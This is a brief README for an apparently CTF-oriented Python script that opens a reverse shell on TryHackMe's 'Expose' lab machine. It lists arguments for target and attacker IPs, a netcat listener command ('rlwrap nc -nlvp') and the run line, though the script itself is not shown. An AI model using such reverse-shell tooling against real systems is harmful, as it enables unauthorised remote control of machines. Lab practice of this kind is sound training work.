Python script to get direct reverse shell of expose machine on tryhackme
- -u = website's IP
- -p = port on which website is running like 1337
- -a = attacker's IP , Your tun0 IP
- -nc = Netcat port , ex : 9001
- run : rlwrap nc -nlvp {port
- python3 shell.py -u {value} -p {value} -a {value} -nc {value}
- Enjoy you shell